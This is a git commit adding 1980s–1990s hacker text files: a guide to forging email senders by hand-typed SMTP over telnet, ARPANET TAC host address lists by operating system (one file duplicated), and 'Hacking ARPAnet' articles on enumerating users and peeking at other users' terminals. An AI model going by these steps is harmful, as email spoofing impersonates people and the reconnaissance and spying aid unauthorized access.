Initial commit

This commit is contained in:
root@procul
2021-04-15 13:31:59 -05:00
commit 278a90f7ce
57951 changed files with 34606208 additions and 0 deletions
+81
View File
@@ -0,0 +1,81 @@
Welcome to Hackerdevil's guide on how to send ANONYMOUS e-mails to someone without a prog.
I am Hackerdevil and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.
This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)
Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25
Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.
So now we are like this.
telnet iname.com 25
and then you hit enter
Then When you have telnet open put the following like it is written
helo
and the machine will reply with smth.
Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
Now you will se what you are writing.
then you put:
mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again
Example:
mail from:<askbill@microsoft.com.net>
You hit enter and then you put:
rcpt to:<lamer@lamer'sworld.com>
This one has to be an existance address as you are mailing anonymously to him.
Then you hit enter
And you type
Data
and hit enter once more
Then you write
Subject:whetever
And you hit enter
you write your mail
hit enter again (boring)
you put a simple:
.
Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done
look:Try first do it with yourself I mean mail annonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!
Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....
Disclamer:Hackerdevil is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Hackerdevil" line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you. If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com" insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.
By Hackerdevil
hackerdevil@iname.com
www.angelfire.com/ar/HDanzi/index.html
File diff suppressed because it is too large Load Diff
+297
View File
@@ -0,0 +1,297 @@
[CTRL-S STOP/START SPACEBAR TO EXIT]
brought to you by:
The Hollow Hills
805-682-5148
(c)opyright 1984 -the wyvern
_______________________________________
first of all part 4 will deal with:
1(and only one):operating systems
and their tac addresses
actually before i begin you must
need to know:
to attach to system xx.x.x.xx,you
type,"@o xx.x.x.xx"
the net will respond with:
tcp trying...
eventually you'll get one of the
following responses:
1)open...your connected
2)host dead...the net # isn't
around any more or never was.
3)host not responding...forget it
it'd probably down
id you get anything else don't
worry,contact me or something.
if you don't connect and you
wanna' try another type:
"@c".if you don't it will say:
"can't"
_______________________________________
OPERATING SYSTEMS:
there are 31 different types
of operating systems.
i have listed all the net numbers
run on that o.s.you'll hafata'
see what they are.don't worry that
is the fun part!!!!!!!!
here you go:
1.cedar
10.2.0.32 xerox
2.cmos
10.7.0.51
10.4.0.46
10.6.0.63
3.cms
26.4.0.92
4.ctos
26.1.0.116
26.10.0.11
26.3.0.116
26.9.0.116
26.1.0.112
26.1.0.71
26.3.0.67
26.4.0.74
26.4.0.54
5.edx
26.6.0.29
6.elf
10.7.0.5
10.1.0.38
1.0.0.46
7.epos
10.1.0.27
10.0.0.22
26.3.0.106
8.foonex
26.4.0.35
9.fuzz
24.6.0.2
10.gcos
26.0.0.101
26.1.0.30
11.its (all mit)
10.2.0.6
10.3.0.6
10.3.0.44
12.locus (all ucla)
10.0.0.1
10.2.0.1
10.3.0.1
13.mos
10.6.0.80
10.1.0.46
10.2.0.44
14.multics
26.0.0.69
10.1.0.94
26.0.0.18
10.0.0.6
10.3.0.31
15.mus
26.3.0.50
10.1.0.1
16.mvs/sd
26.1.0.104
26.4.0.104
17.nonegiven
16.5.0.99
10.2.0.99
10.4.0.99
10.3.0.99
10.0.0.63
10.4.0.63
29.0.0.11
10.5.0.20
18.nonstop
26.7.0.110
19.os-1100
26.3.0.109
26.5.0.8
20.os-1160
26.6.0.108
21.pli
10.2.0.31
10.0.0.2
26.1.0.73
26.3.0.72
26.1.0.57
26.0.0.33
26.3.0.35
26.0.0.35
26.3.0.35
22.rsx11m
26.3.0.65
26.1.0.66
26.6.0.8
26.5.0.53
26.0.0.84
26.0.0.53
26.1.0.48
23.satops
26.4.0.60
24.tenex
26.7.0.118
26.6.0.118
26.5.0.118
26.4.0.118
26.3.0.06
26.4.0.73
26.1.0.43
26.1.0.93
26.0.0.93
26.3.0.43
10.2.0.2
26.2.0.93
10.0.0.32
26.0.0.93
25.tops-10
26.3.0.8
26.1.0.47
10.1.0.96
26.1.0.21
26.7.0.47
10.1.0.14
26.tops-20
10.3.0.62
26.1.0.39
10.0.0.89
26.0.0.74
10.0.0.52
26.0.0.01
26.1.0.13
10.1.0.121
10.0.0.91
26.0.0.65
10.0.0.51
26.7.0.65
10.4.0.2
26.0.0.67
10.3.0.14
10.0.0.79
10.2.0.52
10.1.0.5
10.1.0.79
26.0.0.87
10.1.0.62
10.3.0.4
10.3.0.11
10.0.0.27
26.1.0.103
10.3.0.52
26.6.0.65
10.0.0.56
10.1.0.2
10.1.0.89
10.2.0.119
10.0.0.44
10.0.0.54
10.3.0.5
27.unix
26.4.0.45
26.3.0.45
26.6.0.60
10.2.0.89
10.2.0.51
24.0.0.8
10.1.0.32
26.4.0.16
10.5.0.82
26.0.0.112
26.1.0.114
10.2.0.107
10.1.0.111
26.1.0.84
26.1.0.61
10.1.0.25
26.1.0.74
26.0.0.90
26.5.0.104
26.1.0.29
10.4.0.10
26.0.0.24
10.3.0.82
26.2.0.95
26.3.0.81
10.1.0.16
10.3.0.91
26.1.0.55
26.1.0.81
10.0.0.31
26.0.0.29
26.1.0.58
10.0.0.82
26.6.0.65
28.vm
26.3.0.104
29.vms
26.2.0.45
26.1.0.87
26.4.0.65
26.1.0.122
26.6.0.47
26.2.0.8
26.1.0.50
26.1.0.3
26.0.0.92
26.3.0.26
26.0.0.39
26.6.0.53
10.2.0.79
26.1.0.92
26.1.0.85
26.4.0.47
26.3.0.47
26.6.0.19
26.7.0.50
26.2.0.97
26.6.0.18
26.0.0.70
26.0.0.34
26.1.0.64
26.1.0.19
26.2.0.103
26.3.0.85
26.0.0.85
10.3.0.54
26.2.0.55
10.5.0.2
26.2.0.92
26.3.0.92
26.2.0.19
26.0.0.19
26.3.0.16
30.vms/eunice
26.1.0.35
31.waits
26.1.0.95
10.0.0.11
good lord i'm done!!!!!!!
well have phun and remember:
call:the hollow hills
805-682-5148
later,
[%] the [%]
( hackman )
co-sysop
the hollow hills
WHICH 1-31 (?=MENU,<CR>):

+297
View File
@@ -0,0 +1,297 @@
[CTRL-S STOP/START SPACEBAR TO EXIT]
brought to you by:
The Hollow Hills
805-682-5148
(c)opyright 1984 -the wyvern
_______________________________________
first of all part 4 will deal with:
1(and only one):operating systems
and their tac addresses
actually before i begin you must
need to know:
to attach to system xx.x.x.xx,you
type,"@o xx.x.x.xx"
the net will respond with:
tcp trying...
eventually you'll get one of the
following responses:
1)open...your connected
2)host dead...the net # isn't
around any more or never was.
3)host not responding...forget it
it'd probably down
id you get anything else don't
worry,contact me or something.
if you don't connect and you
wanna' try another type:
"@c".if you don't it will say:
"can't"
_______________________________________
OPERATING SYSTEMS:
there are 31 different types
of operating systems.
i have listed all the net numbers
run on that o.s.you'll hafata'
see what they are.don't worry that
is the fun part!!!!!!!!
here you go:
1.cedar
10.2.0.32 xerox
2.cmos
10.7.0.51
10.4.0.46
10.6.0.63
3.cms
26.4.0.92
4.ctos
26.1.0.116
26.10.0.11
26.3.0.116
26.9.0.116
26.1.0.112
26.1.0.71
26.3.0.67
26.4.0.74
26.4.0.54
5.edx
26.6.0.29
6.elf
10.7.0.5
10.1.0.38
1.0.0.46
7.epos
10.1.0.27
10.0.0.22
26.3.0.106
8.foonex
26.4.0.35
9.fuzz
24.6.0.2
10.gcos
26.0.0.101
26.1.0.30
11.its (all mit)
10.2.0.6
10.3.0.6
10.3.0.44
12.locus (all ucla)
10.0.0.1
10.2.0.1
10.3.0.1
13.mos
10.6.0.80
10.1.0.46
10.2.0.44
14.multics
26.0.0.69
10.1.0.94
26.0.0.18
10.0.0.6
10.3.0.31
15.mus
26.3.0.50
10.1.0.1
16.mvs/sd
26.1.0.104
26.4.0.104
17.nonegiven
16.5.0.99
10.2.0.99
10.4.0.99
10.3.0.99
10.0.0.63
10.4.0.63
29.0.0.11
10.5.0.20
18.nonstop
26.7.0.110
19.os-1100
26.3.0.109
26.5.0.8
20.os-1160
26.6.0.108
21.pli
10.2.0.31
10.0.0.2
26.1.0.73
26.3.0.72
26.1.0.57
26.0.0.33
26.3.0.35
26.0.0.35
26.3.0.35
22.rsx11m
26.3.0.65
26.1.0.66
26.6.0.8
26.5.0.53
26.0.0.84
26.0.0.53
26.1.0.48
23.satops
26.4.0.60
24.tenex
26.7.0.118
26.6.0.118
26.5.0.118
26.4.0.118
26.3.0.06
26.4.0.73
26.1.0.43
26.1.0.93
26.0.0.93
26.3.0.43
10.2.0.2
26.2.0.93
10.0.0.32
26.0.0.93
25.tops-10
26.3.0.8
26.1.0.47
10.1.0.96
26.1.0.21
26.7.0.47
10.1.0.14
26.tops-20
10.3.0.62
26.1.0.39
10.0.0.89
26.0.0.74
10.0.0.52
26.0.0.01
26.1.0.13
10.1.0.121
10.0.0.91
26.0.0.65
10.0.0.51
26.7.0.65
10.4.0.2
26.0.0.67
10.3.0.14
10.0.0.79
10.2.0.52
10.1.0.5
10.1.0.79
26.0.0.87
10.1.0.62
10.3.0.4
10.3.0.11
10.0.0.27
26.1.0.103
10.3.0.52
26.6.0.65
10.0.0.56
10.1.0.2
10.1.0.89
10.2.0.119
10.0.0.44
10.0.0.54
10.3.0.5
27.unix
26.4.0.45
26.3.0.45
26.6.0.60
10.2.0.89
10.2.0.51
24.0.0.8
10.1.0.32
26.4.0.16
10.5.0.82
26.0.0.112
26.1.0.114
10.2.0.107
10.1.0.111
26.1.0.84
26.1.0.61
10.1.0.25
26.1.0.74
26.0.0.90
26.5.0.104
26.1.0.29
10.4.0.10
26.0.0.24
10.3.0.82
26.2.0.95
26.3.0.81
10.1.0.16
10.3.0.91
26.1.0.55
26.1.0.81
10.0.0.31
26.0.0.29
26.1.0.58
10.0.0.82
26.6.0.65
28.vm
26.3.0.104
29.vms
26.2.0.45
26.1.0.87
26.4.0.65
26.1.0.122
26.6.0.47
26.2.0.8
26.1.0.50
26.1.0.3
26.0.0.92
26.3.0.26
26.0.0.39
26.6.0.53
10.2.0.79
26.1.0.92
26.1.0.85
26.4.0.47
26.3.0.47
26.6.0.19
26.7.0.50
26.2.0.97
26.6.0.18
26.0.0.70
26.0.0.34
26.1.0.64
26.1.0.19
26.2.0.103
26.3.0.85
26.0.0.85
10.3.0.54
26.2.0.55
10.5.0.2
26.2.0.92
26.3.0.92
26.2.0.19
26.0.0.19
26.3.0.16
30.vms/eunice
26.1.0.35
31.waits
26.1.0.95
10.0.0.11
good lord i'm done!!!!!!!
well have phun and remember:
call:the hollow hills
805-682-5148
later,
[%] the [%]
( hackman )
co-sysop
the hollow hills
WHICH 1-31 (?=MENU,<CR>):

+280
View File
@@ -0,0 +1,280 @@
////////////////
/ ARPANET /
////////////////
FIRST OF ALL PART 4 WILL DEAL WITH:
1(AND ONLY ONE):OPERATING SYSTEMS AND THEIR TAC ADDRESSES
ACTUALLY BEFORE I BEGIN YOU MUST NEED TO KNOW:
TO ATTACH TO SYSTEM XX.X.X.XX,YOU TYPE,"@O XX.X.X.XX"
THE NET WILL RESPOND WITH:
TCP TRYING...
EVENTUALLY YOU'LL GET ONE OF THE FOLLOWING RESPONSES:
1)OPEN...YOUR CONNECTED
2)HOST DEAD...THE NET # ISN'T AROUND ANY MORE OR
NEVER WAS.
3)HOST NOT RESPONDING...FORGET IT IT'S PROBABLY DOWN
IF YOU GET ANYTHING ELSE DON'T WORRY,CONTACT ME OR
SOMETHING. IF YOU DON'T CONNECT AND YOU WANNA TRY ANOTHER
TYPE:
"@C".
IF YOU DON'T IT WILL SAY:
"CAN'T"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
OPERATING SYSTEMS:
THERE ARE 31 DIFFERENT TYPES OF OPERATING SYSTEMS.
I HAVE LISTED ALL THE NET NUMBERS RUN ON THAT O.S.YOU'LL
HAFTA SEE WHAT THEY ARE.DON'T WORRY THAT IS THE FUN
PART!!!!!!!!
HERE YOU GO...:
1.CEDAR
10.2.0.32 XEROX
2.CMOS
10.7.0.51
10.4.0.46
10.6.0.63
3.CMS
26.4.0.92
4.CTOS
26.1.0.116
26.10.0.11
26.3.0.116
26.9.0.116
26.1.0.112
26.1.0.71
26.3.0.67
26.4.0.74
26.4.0.54
5.EDX
26.6.0.29
6.ELF
10.7.0.5
10.1.0.38
1.0.0.46
7.EPOS
10.1.0.27
10.0.0.22
26.3.0.106
8.FOONEX
26.4.0.35
9.FUZZ
24.6.0.2
10.GCOS
26.0.0.101
26.1.0.30
11.ITS (ALL MIT)
10.2.0.6
10.3.0.6
10.3.0.44
12.LOCUS (ALL UCLA)
10.0.0.1
10.2.0.1
10.3.0.1
13.MOS
10.6.0.80
10.1.0.46
10.2.0.44
14.MULTICS
26.0.0.69
10.1.0.94
26.0.0.18
10.0.0.6
10.3.0.31
15.MUS
26.3.0.50
10.1.0.1
16.MVS/SD
26.1.0.104
26.4.0.104
17.NONEGIVEN
16.5.0.99
10.2.0.99
10.4.0.99
10.3.0.99
10.0.0.63
10.4.0.63
29.0.0.11
10.5.0.20
18.NONSTOP
26.7.0.110
19.OS-1100
26.3.0.109
26.5.0.8
20.OS-1160
26.6.0.108
21.PLI
10.2.0.31
10.0.0.2
26.1.0.73
26.3.0.72
26.1.0.57
26.0.0.33
26.3.0.35
26.0.0.35
26.3.0.35
22.RSX11M
26.3.0.65
26.1.0.66
26.6.0.8
26.5.0.53
26.0.0.84
26.0.0.53
26.1.0.48
23.SATOPS
26.4.0.60
24.TENEX
26.7.0.118
26.6.0.118
26.5.0.118
26.4.0.118
26.3.0.06
26.4.0.73
26.1.0.43
26.1.0.93
26.0.0.93
26.3.0.43
10.2.0.2
26.2.0.93
10.0.0.32
26.0.0.93
25.TOPS-10
26.3.0.8
26.1.0.47
10.1.0.96
26.1.0.21
26.7.0.47
10.1.0.14
26.TOPS-20
10.3.0.62
26.1.0.39
10.0.0.89
26.0.0.74
10.0.0.52
26.0.0.01
26.1.0.13
10.1.0.121
10.0.0.91
26.0.0.65
10.0.0.51
26.7.0.65
10.4.0.2
26.0.0.67
10.3.0.14
10.0.0.79
10.2.0.52
10.1.0.5
10.1.0.79
26.0.0.87
10.1.0.62
10.3.0.4
10.3.0.11
10.0.0.27
26.1.0.103
10.3.0.52
26.6.0.65
10.0.0.56
10.1.0.2
10.1.0.89
10.2.0.119
10.0.0.44
10.0.0.54
10.3.0.5
27.UNIX
26.4.0.45
26.3.0.45
26.6.0.60
10.2.0.89
10.2.0.51
24.0.0.8
10.1.0.32
26.4.0.16
10.5.0.82
26.0.0.112
26.1.0.114
10.2.0.107
10.1.0.111
26.1.0.84
26.1.0.61
10.1.0.25
26.1.0.74
26.0.0.90
26.5.0.104
26.1.0.29
10.4.0.10
26.0.0.24
10.3.0.82
26.2.0.95
26.3.0.81
10.1.0.16
10.3.0.91
26.1.0.55
26.1.0.81
10.0.0.31
26.0.0.29
26.1.0.58
10.0.0.82
26.6.0.65
28.VM
26.3.0.104
29.VMS
26.2.0.45
26.1.0.87
26.4.0.65
26.1.0.122
26.6.0.47
26.2.0.8
26.1.0.50
26.1.0.3
26.0.0.92
26.3.0.26
26.0.0.39
26.6.0.53
10.2.0.79
26.1.0.92
26.1.0.85
26.4.0.47
26.3.0.47
26.6.0.19
26.7.0.50
26.2.0.97
26.6.0.18
26.0.0.70
26.0.0.34
26.1.0.64
26.1.0.19
26.2.0.103
26.3.0.85
26.0.0.85
10.3.0.54
26.2.0.55
10.5.0.2
26.2.0.92
26.3.0.92
26.2.0.19
26.0.0.19
26.3.0.16
30.VMS/EUNICE
26.1.0.35
31.WAITS
26.1.0.95
10.0.0.11
WELL HAVE PHUN AND REMEMBER:
CALL THE HOLLOW HILLS
805-682-5148
LATER,
[%] THE [%]
( HACKMAN )
COSYSOP
THE HOLLOW HILLS
Binary file not shown.
+311
View File
@@ -0,0 +1,311 @@
****************************************
Hacking ARPAnet -- Part II
by
The SOURCE
of
-=>*The Listening Post*<=-
408-923-7575
***************************************
LEARNING WHO's WHO
------------------
As mentioned earlier, ARPANET can be made to disclose a great deal of
information before you have logged on or even hacked a password. Among the most
useful commands are those that tell you who else is on the system and what the
status of the system is. These files give you information that will help your
future hacking activities. In this section we discuss commands that disclose
data about users that are available from the EXEC level.
@HELP WHOIS <user entry>
NICNAME (alias WHOIS) is a utility for cross-net access of the NIC user
registration database. NICNAME has been chosen as the global name for the
program, although many sites will choose to use the more familiar WHOIS name for
the program.
For the convenience of sites without user programs to interact with the NICNAME
server, WHOIS may be run on the SRI-NIC machine via Telnet service without
logging in. The documentation below is slightly inaccurate in this case,
since there is no need to reach further through the net to access the database,
as the user program and the database are both on SRI-NIC.
The initial procedure is a one-reach, one-response query, which allows users at
any Internet site to obtain information about an organization or individual by
providing either a name or an IDENT. The protocol used is a TCP protocol. A
server program running at SRI-NIC takes the user's request, accesses the NIC
database and sends back the reply.
The reply can be in one of three forms:
1) Record for individual or organization found, information (including
name, ident, organization, mailing address and network address) is
returned to user.
2) Given name matches more than one record. A short entry is returned for
each matching record and the ueer is told to re-query the system using
the ident to match any one iddividual or organization shown.
3) No record matched. If an ident was given, this response means that the
ident is free for use by an individual or organization, and can be
obtained for such by contacting NIC.
Examples of use follow. For clarity, the user's typeing appears in
uppercase:
I. Request for help information.
@WHOIS
Ident: ?
; Accessing NICNAME server at SRI-NIC...
Please enter a name or a handle ("ident"), such as "Smith" or "SRI-NIC".
Starting with a period forces a name-only search; starting with exclamation
point forces handle-only. Examples:
Smith [looks for name or handle SMITH]
!SRI-NIC [looks for handle SRI-NIC only]
.Smith, John [looks for name JOHN SMITH only]
Adding "..." to the argument will match anything from that point, e.g.
"ZU..." will match ZUL, ZUM, etc.
To search for all the authorized users of a host, use:
%HOST
To search for mailboxes, use one of these forms:
Smith@ [looks for mailboxes with username SMITH]
@Host [looks for mailboxes on HOST]
Smith@Host [Looks for mailboxes with username SMITH on HOST]
To have the ENTIRE membership list of a group or organization, if you are
asking about a group or org, shown with the record, use an asterisk character
"*" directly preceding the given argument. [CAUTION: If there are a lot of
members this will take a long time!]
You may of course use exclamation point and asterisk, or a period and
asterisk together.
II. Search by name only.
@WHOIS .GRAY
; Accessing NICNAME server at SRI-NIC...
There are 9 matching entries.
Gray, Beth (BG10) BGRAY@UDEL-RELAY (202) 274-9446 (AV) 284-9446
Gray, Bobby R. (BRG) BRGray@RADC-MULTICS (315) 330-4846 (AV) 587-4846
Gray, Bruce (BG17) DRSEL-TCS-MCF@OFFICE-7 (201) 544-3671 (AV) 995-3671
Gray, Charles W. (CWG1) CWGray@RADC-MULTICS (315) 330-2116 (AV) 587-2116
Gray, Gilbert R. (GRG2) gray@NEMS (202) 227-1270 (AV) 287-1270
Gray, Neil (NG1) GRAY@SUMEX-AIM (415) 497-1712
Gray, Purnell (PG5) DRSTS-DS@OFFICE-1 (314) 263-3397 (AV) 693-3397
Gray, Randy K. (RKG) DRSEL-CP-RA@OFFICE-7 (201) 544-4733
Gray, Richard M. (RMG) WESTDIV@USC-ISI (707) 646-3514
To single out any one of these, repeat the command, using "IDENT" or "!IDENT"
instead of "NAME" (e.g., "vw" or "!vw" instead of "white").
III. Search by name or ident specifying an ident.
@WHOIS VW
Accessing NICNAME server at SRI-NIC...
White, Victor A. (VW) VIC@SRI-KL
SRI International
Network Information Center
Telecommunications Sciences Center
333 Ravenswood Avenue
Menlo Park, California 94025
Phone: (415) 859-5303
Send additions or changes to NIC@SRI-NIC
IV. Search by name or handle specifying a name with an ellipsis.
@WHOIS STEPH...
Squires, Stephen L. (STEPH) SQUIRES@USC-ISI (202) 694-5917
Stephany, Michael (MS30) USARCCO@STL-HOST1 (620) 538-8285 (AV) 879-8285 (FTS)
769-8285
Stephen-Smith, Kay (SS2) STEPHENSMITH@SRI-KL (01) 681-1751
Stephens, Donald L. (DLS2) LAOFTHOOD@STL-HOST1 (AV) 737-6608 or 737-3103
Stephens, Eugene F. (EFS1) LAOFTPOLK@STL-HOST1 (AV) 863-4876 or 863-4888
Stephens, Nadine Y. (NYS) DSDC-SGY@GUNTER-ADAM (205) 279-4901
V. Search for mailboxes.
@WHOIS MIKE@
Muuss, Michael John (MJM2) MIKE@BRL (301) 278-6678 or 278-6239 (FTS) 939-66
78 or 939-6239
Wahrman, Mike (MW19) mike@CCA-UNIX (703) 522-1717
Liveright, Mike (ML1) MIKE@KESTREL (415) 494-2233
Wahrman, Michael L. (MLW) mike@RAND-UNIX (213) 393-0411
Stonebraker, Michael R. (MRS) mike@UCB-VAX (415) 642-5799 or 642-3068
@WHOIS GPARK@DDN1
Parker, Glynn (GP) gpark@DDN1
Defense Communications Agency
Code B627
Washington, D.C. 20305
Phone: (703) 285-5133
MILNET TAC user
@WHOIS @MIT-ML
Ressler, Andrew L. (ALR) ALR@MIT-ML (617) 253-3504
Kuipers, Benjamin (BK2) BEN@MIT-ML (617) 628-5000 ext 6650
Davies, Byron (BD5) BYRON@MIT-ML (617) 253-3507
.
. (items omitted here for brevity)
<the job autologs itself out and the monitor is ready for the next command>
FINGER YOURSELF?
----------------
Let's try the command:
@FINGER
User Personal name Job Subsys Idle TTY Console location
??? 34 FINGER .106 Internet: SU-TAC#13
DOMAIN Domain Server 28 DSV *:** 102 Job 0, OPERATOR, SYSJOB
FEINLER Jake Feinler 31 :BASE 30 EJ200 Jake Feinler x6287
HENRY Henry Chen 41 EXEC . Detached
KLH Ken Harrenstien 26 EMACS 1 17 TSC MICOM 30 [P235]
X-MAN Jeff Thompson 27 EXEC 12. 3 EK205 Operator Fishbowl x4664
35 EMACS 14 TSC MICOM 30 [P232]
@HELP SYSTAT
The SYSTAT command lists information about jobs logged into the system in order
of job number, along with the date and time, how long the system has been up,
the number of jobs logged in, and load average information.
If the user is logged in from another host, the name of that host is given under
the Foreign host heading.
For example:
@systat
Tue 14-Aug-84 15:29:38 Up 45:40:40
20+13 Jobs Load av 1.70 1.33 1.43
Job Line Program User Foreign host
13 102 DSV DOMAIN
14 40 EXEC NAN
15 16 VOID KLH
16 DET EXEC HENRY
17 106 FTPSRT ANONYMOUS (SRI-KL)
18 54 TYPE OLE
19 3 EXEC SAPPHO
20* 51 SYSTAT STACIA
22 11 EXEC SAPPHO
25 60 MM OLE
There are a number of arguments which can be given to the SYSTAT command. These
can be listed by typing SYSTAT ?. These arguments include:
. All Charge Class Controlling
Directory Header In-Class Limit Line
Lpt No Program State System
Time What Where Who
or user name
or directory name
or Decimal job umber
or ","
or confirm with carriage return
combinations of arguments may be given:
@sys stacia all header
Tue 14-Aug-84 15:35:12 Up 45:46:14
20+13 Jobs Load av 3.37 2.67 2.02
Job CJB Line Program State Time Limit User, <Directory> Foreign host
20* 51 SYSTAT RUN 0:09:35 STACIA, PS:<HELP>
@sys stacia all no directory
Tue 14-Aug-84 15:35:44 Up 45:46:46
20+13 Jobs Load av 3.09 2.67 2.04
Job CJB Line Program State Time Limit User Foreign host
20* 51 SYSTAT RUN 0:09:37 STACIA
The first listed all SYSTAT information about user STACIA. The second listed
all of the information given before, without listing the connected directory.
WHAT's AVAILABLE ON THE DDN
---------------------------
@NIC <enter NIC after @ prompt>
TOP <enter TOP to start at beginning of file>
NIC/Query is a database system containing information about the Defense Data
Network (DDN), including MILNET and ARPANET. Each list of topics is presented
to the user as a numbered menu of selections.
- To see more detail on any of the topics below, type its corresponding number
followed by a carriage return, <CR>.
- To leave NIC/Query, type 'quit<CR>'.
- For more help and additional commands, type 'help<CR>'.
1. INTERNET PROTOCOLS -- Describes Internet protocols
2. PROGRAMS -- Describes programs available on DDN hosts
3. PERSONNEL -- Directory of DDN users
4. HOSTS -- Describes DDN hosts
5. RFCS -- Requests For Comments technical notes
6. IENS -- Internet Experiment Notes
7. NIC DOCUMENTS -- Documents available from the NIC
_ for back, ^ for up, + for top, or menu # (1-7): QUIT <let's return to this
menu later>
LOGING OUT
-----------
You haven't really loged in yet, and a quick way of loging out is to enter a
"C" at the prompt or to simply unplug your phone. However, ARPANET's own files
can be revealing:
@HELP KK
The LOGOUT command logs you off of the system and expunges all deleted files in
your directory. Synonyms for LOGOUT include K and KK.
You may also log out another job logged in on your account by specifying the
job number after the LOGOUT command. In this case a message describing the job
to be logged out is printed, and a confirming RETURN is required.
If your job hangs, you might wish to log in at another terminal and then LOGOUT
the other job, as described in the last paragraph. First find the other job
number, as follows:
@systat jsmith
27* 54 SYSTAT JSMITH
32 112 BASIC JSMITH
The * indicates the job number of the job issuing the SYSTAT command. You will
want to use the other job number -- 32 in this case:
@logout 32
JSMITH, TTY112, BASIC
[Confirm]
and you confirm by pressing the RETURN key.
MORE HELP
---------
@HELP ATTACH
ATTACH allows you to move a job to a different terminal or to return it to a
terminal from detached status.
To ATTACH, say
@attach USERNAME
Password:
At the Password prompt, type in your password (which will not be echoed to the
screen) and your job will be attached.
If you have more than one job logged on to the system, you will need to supply
a job number after your username. Finger yourself to find out this information.
If you are attaching a job which is already attached to another terminal, you
will be asked to confirm with carriage return before the Password prompt.
(In Part III of Hacking ARPANET by The Source, some of the best information
ARPANET will tell any "anonymous guest" once you leave the Exec.)
Cracking ARPANET by The Source, some of the best information
Binary file not shown.
Binary file not shown.
+154
View File
@@ -0,0 +1,154 @@
*************************************
Hacking Arpanet -- Part V
by
The Source
**************************************
PEEKING AND SPYING
------------------
This article discusses the commands that "anonymous guest" can use to learn
what other people are doing on the system.
.HELP PK
The PK program can be used to PeeK at the input and output buffers of any
terminal, and the line editor buffer of a display. To run PK, give the monitor
command "R PK". PK will ask for a terminal line number, and will display that
terminal's buffers plus the who line of the job, if any, using that terminal.
PK can also display the contents of some of the internal system variables
associated with the terminal (see + and - commands below; the default is not to
display this system data).
If the selected terminal is hidden (by ESC H), PK will so notify you. You may
choose to override the hiding, but if so, the selected terminal is notified that
you are spying on it.
If you are using a SAIL display, the selected terminal's buffers will be
displayed on your screen about once per second, like a WHO display.
If you are using a non-display, the PK information will be typed once.
While PK is running on a display, you can give it any of the commands in the
table below to have it display different information (in the table, <cr> means
carriage return). Whenever PK exits on a DD or III, the last buffer display
will remain on your screen until you reset your display by BREAK P or by running
another program.
<line number><cr> Display buffers of the given terminal line.
+<line number><cr> Display given terminal line and enable data display.
-<line number><cr> Display given terminal line and disable data display.
<linefeed> Display buffers of the next higher numbered terminal.
<altmode> Display buffers of the next lower numbered terminal.
^B^C<digit> Update the display NOW and every <digit> seconds (1:9).
^B^C0 Update the display NOW, then only once for each command.
+<cr> Enable display of system internal data at top of screen.
-<cr> Disable display of system internal data at top of screen.
<cr> Stop the displaying and exit to the monitor.
<monitor cmd> Exit and execute the given monitor command.
.HELP PPK
PPK allows you to peek at the screen of someone at a display terminal (a
DataDisc, III or Datamedia). Say "R PPK", and give it the line number of the
terminal you want to observe. (For DataDiscs, this is NOT the number reported
by FINGER; it's the number following the PPN in the person's wholine, and can be
found with the WHERE command.)
If you are on a display yourself and have your wholine turned on, PPK changes
your wholine to be that of the job at which you're peeking. (Your original
wholine selection is restored when you exit.)
Once you have selected a lial "observe page printer" mode. (Do NOT follow the
E or N with a carriage return, or PPK will exit!) Typing another line number
followed by a carriage return gets you another victim. A raw carriage return
causes the program to exit.
If the selected terminal is hidden (by ESC H), PPK will so notify you. You may
choose to override the hiding, but if so, the selected terminal is notified
that you are spying on it.
The display is updated about once every two seconds. You can force an
immediate update by typing ALTMODE. You can also set the rate by typing
control-meta-digit, where 1-9 = 1-9 secs and 0 causes the display never to be
updated (except when you type ALTMODE).
.HELP POLL
POLL accepts an audio channel number and lists those terminals which are
listening to it, and the PPN, if someone is logged in at that terminal. An
argument of * will list all nonzero audio channels.
r poll
CHANNEL=10
TV-46: TTY53 JOB 41 [1,BH]
TV-47: TTY64
TV-51: TTY52 JOB 46 [1,CR]
TV-63: TTY33 JOB 7 [SF,SF]
.HELP TALK
The command to communicate with another user is called TALK. It makes
everything that either one of you types appear on both terminals. (Note: If
you want to know about the TALK program on the Altos, READ DMCHAT, which
describes both Alto DMCHAT and Alto TALK. The writeup below is for the TALK
command on SAIL, which is completely different from Alto TALK.) The argument
to TALK is either the programmer name of the person you want to talk to, the
device name of the terminal you want to talk to, or an ARPAnet address. For
example:
TALK MRC
TALK TTY34
TALK RMS@AI (% is legal as a host name delimiter also).
The command may fail for any of the following reasons:
user not logged in (use MAIL)
user logged in more than once (use a terminal instead of a user spec)
user gagged or (for ARPAnet TALK) refusing links (use MAIL)
the ARPAnet site is unreachable or does not support network linking
When you are in a (local) talk ring, what you type goes only to the terminals
in the ring, not to the monitor or a user program. To leave the talk ring,
type [CALL] (control-C from non-displays).
TALKing to local users does not run a program; hence the core image is
preserved.
TALKing to network users runs a program. To leave network talk, type
<CONTROL><META>[LF] (control-Z from monitor. It is considered antisocial to
use the TALK command to establish communication with strangers. A better way is
the SEND command, which will send a message to a user but does not interfere
with his work. For this reason, the TALK command requires that you be logged
in. If you don't have an account, you can use SEND to request the user TALK
